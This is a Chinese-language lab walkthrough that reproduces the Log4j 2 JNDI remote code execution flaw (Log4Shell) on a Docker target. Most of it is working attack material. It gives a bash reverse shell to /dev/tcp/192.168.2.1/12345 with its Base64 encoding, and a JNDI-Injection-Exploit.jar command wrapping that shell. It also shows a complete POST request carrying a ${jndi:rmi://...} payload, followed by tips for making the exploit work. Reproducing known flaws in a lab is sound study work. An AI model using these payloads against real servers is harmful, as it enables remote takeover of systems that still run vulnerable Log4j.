漏洞环境利用条件

Apache Log4j 2.x <= 2.14.1
将收到的日志写到参数当中

自行搭建

wget https://dlcdn.apache.org/logging/log4j/2.15.0/apache-log4j-2.15.0-bin.zip

Apache Log4j 2 下载地址

https://logging.apache.org/log4j/2.x/download.html

docker搭建

docker pull vulfocus/log4j2-rce-2021-12-09:latest

docker run --name 13log4j2-rce -p 8080:8080 -d vulfocus/log4j2-rce-2021-12-09:latest

漏洞复现

目标机由Docker部署的底层Linux系统

将反弹语句bash -i >& /dev/tcp/192.168.2.1/12345 0>&1进行Base64编码如下:

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMS8xMjM0NSAwPiYx

攻击机192.168.2.1 启用JDNI注入以及RMI远程服务器调用,将Payload作为调用对象序列化至RMI请求中

java -jar JNDI-Injection-Exploit.jar -C "bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMS8xMjM0NSAwPiYx}|{base64,-d}|{bash,-i}'" -A "192.168.2.1"

本地监听12345端口

POST请求目标机http://192.168.2.4:60001/hello

完整请求数据包:

POST /hello HTTP/1.1
Host: 192.168.2.4:60001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3880.400 QQBrowser/10.8.4554.400
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

payload=${jndi:rmi://192.168.2.1:1099/v3hoyk}

查看RMI请求

查看Shell回话反弹:

成功获取目标服务器权限

注意

1. bash -i >& /dev/tcp/192.168.2.1/12345 0>&1
   反弹shell的payload要进行编码，否则会反弹失败
   JNDI注入对特殊字符可能会无法处理

2. payload=${jndi:rmi://192.168.2.1:1099/v3hoyk}
   这个payload的地址是执行JNDI-Injection-Exploit.jar后，此工具生成的。所以复现的时候要替换字符串v3hoyk为以下的字符串下方的地址。

Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.158.1.159:1099/s583yi

参考资料

• 使用Log4j